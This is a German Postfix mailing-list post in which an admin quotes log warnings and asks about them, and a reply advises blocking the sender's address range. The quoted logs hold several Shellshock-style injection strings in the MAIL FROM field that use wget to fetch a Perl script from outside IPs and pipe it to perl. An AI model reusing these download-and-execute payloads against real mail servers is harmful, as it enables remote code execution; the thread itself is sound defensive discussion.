Frage zu Illegal address syntax Attacke
Walter H.
Walter.H at mathemainzel.info
So Jun 4 21:10:58 CEST 2023
On 04.06.2023 20:39, Joerg Hartmann wrote:
> Hallo,
>
> in letzter Zeit habe ich häufiger Logeinträge der folgenden Form:
>
> May 28 15:57:04 www postfix/smtpd[7094]: warning: Illegal address
> syntax from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() {
> :; }; wget -qO - 136.243.150.82/das|perl>
> May 31 06:40:12 www postfix/smtpd[7307]: warning: Illegal address
> syntax from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() {
> :; }; wget -qO - 68.235.39.225/pax|perl>
> Jun 1 14:51:50 www postfix/smtpd[18260]: warning: Illegal address
> syntax from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() {
> :; }; wget -qO - 68.235.39.225/pax|perl>
> Jun 1 21:06:28 www postfix/smtpd[20438]: warning: Illegal address
> syntax from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() {
> :; }; wget -qO - 68.235.39.225/ipax|perl>
> Jun 2 15:43:35 www postfix/smtpd[25713]: warning: Illegal address
> syntax from unknown[104.200.146.36] in MAIL command: <() { :; }; wget
> -qO - 68.235.39.225/ipax|perl>
>
> Offensichtlich ist dies eine Art "SMTP-Injection" Attacke, bei der
> eine lokale Shell gestartet werden soll um per wget eine Datei zu
> holen, die zu perl gepiped wird. Das per wget abzuholende File ist
> ein Perl-Script von ca. 20KByte Größe mit "unfreundlichem" Inhalt.
>
> Ich kann jedoch nicht erkennen, welche Stelle des "SMTP-Dialogs" hier
> angegriffen wird. "Illegal address" deutet (für mich) eher auf die
> FROM oder RECIPT TO Kommandos hin. Kann jemand das besser erläutern?
> Danke!
>
> Grüße
> Jörg
Hallo,
hier wird offentsichtlich an Stelle des üblichen
MAIL FROM: <hugo at domain.de>
derartiger Käse veranstaltet;
f. den Fall, dass Du aus diesem Bereich keine Mails erwartest,
einfach den Adressrange 104.200.128.0/19 in der Firewall sperren;
Grüße,
Walter
-------------- nächster Teil --------------
Ein Dateianhang mit Binärdaten wurde abgetrennt...
Dateiname : smime.p7s
Dateityp : application/pkcs7-signature
Dateigröße : 3550 bytes
Beschreibung: S/MIME Cryptographic Signature
URL : <https://de.postfix.org/pipermail/postfix-users/attachments/20230604/e923adb1/attachment.p7s>
Mehr Informationen über die Mailingliste postfix-users